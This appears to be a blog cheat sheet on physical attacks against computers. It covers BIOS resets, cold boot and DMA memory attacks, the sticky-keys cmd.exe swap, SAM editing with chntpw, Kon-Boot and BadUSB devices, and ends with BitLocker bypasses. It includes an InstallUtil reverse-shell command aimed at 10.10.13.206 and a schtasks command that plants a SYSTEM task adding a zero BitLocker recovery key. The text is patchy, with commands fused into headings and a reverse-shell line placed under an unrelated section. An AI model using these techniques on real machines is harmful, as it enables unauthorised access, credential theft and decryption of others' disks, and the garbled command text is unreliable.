About Cyber Physical Attacks
In a physical attack, an attacker gains physical access to a
physical asset in the infrastructure system in order to damage it,
disable it, steal it, or use it in an undesirable way. … The goal is to produce a security system that has balanced physical protection for all potential adversary scenarios.
Here are some common examples of how physical threat vectors can compromise digital security:
- An infected USB drive is planted in a parking lot, lobby, etc., which an employee picks up and loads onto the network.
- An attacker breaks into a server room and installs rogue devices that capture confidential data.
- The internet drop line is accessible from outside of the building, allowing an attacker to intercept data or cut the line completely.
- An attacker pretends to be an employee and counts on a real employee’s courtesy to hold the door for him as they enter together.
- An inside actor looks over the shoulder of a system engineer as they type administrative credentials into a system.
Some Comman Physical Attacks:-
BIOS password
The battery
Most of the motherbords have a battery. If you remove it 30min the settings of the BIOS will be restarted (password included).
Jumper CMOS
Most of the motherboards have a jumper that can restart the settings. This jumper connects a central pin with another, if you connect thoses pins the motherbord will be reseted.
Live Tools
If you could run for example a Kali Linux from a Live CD/USB you could use tools like killCmos or CmosPWD (this last one is included in Kali) you could try to recover the password of the BIOS.
UEFI Attack
To check the settings of the UEFI and perform some kind of attack you should try chipsec.
Using this tool you could easily disable the Secure Boot:
python chipsec_main.py -module exploits.secure.boot.pkBy RAM
Cold boot
The RAM memory is persistent from 1 to 2 minutes from the time the computer is powered off. If you apply cold (liquid nitrogen, for example) on the memory card you can extend this time up to 10 minutes.Then, you can do a memory dump (using tools like dd.exe, mdd.exe, Memoryze, win32dd.exe or DumpIt) to analyze the memory.You should analyze the memory using volatility.
Inception is a physical memory manipulation and hacking tool exploiting PCI-based DMA. The tool can attack over FireWire, Thunderbolt, ExpressCard, PC Card and any other PCI/PCIe HW interfaces. Connect your computer to the victim computer over one of those interfaces and INCEPTION will try to patch the pyshical memory to give you access.If INCEPTION succeeds, any password introduced will be vaid.It doesn’t work with Windows10.
Live CD/USB Attacks
Sticky Keys and more
- SETHC:sethc.exe is invoked when SHIFT is pressed 5 times
- UTILMAN:Utilman.exe is invoked by pressing WINDOWS+U
- OSK:osk.exe is invoked by pressing WINDOWS+U, then launching the on-screen keyboard
- DISP:DisplaySwitch.exe is invoked by pressing WINDOWS+P
These binaries are located inside C:\Windows\System32. You can change any of them for a copy of the binary cmd.exe (also in the same folder) and any time that you invoke any of those binaries a command prompt as SYSTEM will appear.
Modifying SAM
You can use the tool chntpw to modify the SAM file of a mounted Windows filesystem. Then, you could change the password of the Administrator user, for example.
This tool is available in KALI.
chntpw -hchntpw -l <path_to_SAM>Inside a Linux system you could modify the/etc/shadowor/etc/passwdfile.
Kon-Boot
Kon-Boot is one of the best tools around which can log you into Windows without knowing the password. It works by hooking into the system BIOS and temporarily changing the contents of the Windows kernel while booting (new versions work also with UEFI). It then allows you to enter anything as the password during login. The next time you start the computer without Kon-Boot, the original password will be back, the temporary changes will be discarded and the system will behave as if nothing has happened.
It is a live CD/USB that can patch the memory so you won’t need to know the password to login. Kon-Boot also performs the StickyKeys trick so you could press Shift5 times to get an Administrator cmd.
Running Windows Attacks
Booting shortcuts
- supr – BIOS
- f8 – Recovery mode
- supr – BIOS ini
- f8 – Recovery mode
- Shitf (after the windows banner) – Go to login page instead of autologon (avoid autologon)
BAD USBs
Rubber Ducky
The USB Rubber Ducky injects keystrokes at superhuman speeds, violating the inherent trust computers have in humans by posing as a keyboard.
Teensyduino
The Teensy is a complete USB-based microcontroller development system, in a very small footprint, capable of implementing many types of projects. All programming is done via the USB port.
Volume Shadow Copy
With administrators privileges and powershell you could make a copy of the SAM file.
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.13.206 /rport=443 /U c:\temp\psby.exeBypassing Bitlocker
Bitlocker uses 2 passwords. The one used by the user, and the recovery password (48 digits).If you are lucky and inside the current session of Windows exists the file C:\Windows\MEMORY.DMP (It is a memory dump) you could try to search inside of it the recovery password. You can get this file and a copy of the filesytem and then use Elcomsoft Forensic Disk Decryptor to get the content (this will only work if the password is inside the memory dump). You could also force the memory dump using NotMyFault of Sysinternals, but this will reboot the system and has to be executed as Administrator.
You could also try a bruteforce attack using Passware Kit Forensic.
Social Engineering
Finally, you could make the user add a new recovery password making him executed as administrator:
schtasks /create /SC ONLOGON /tr "c:/windows/system32/manage-bde.exe -protectors -add c: -rp 000000-000000-000000-000000-000000-000000-000000-000000" /tn tarea /RU SYSTEM /fThis will add a new recovery key (composed of 48 zeros) in the next login.To check the valid recovery keys you can execute:
manage-bde -protectors -get c: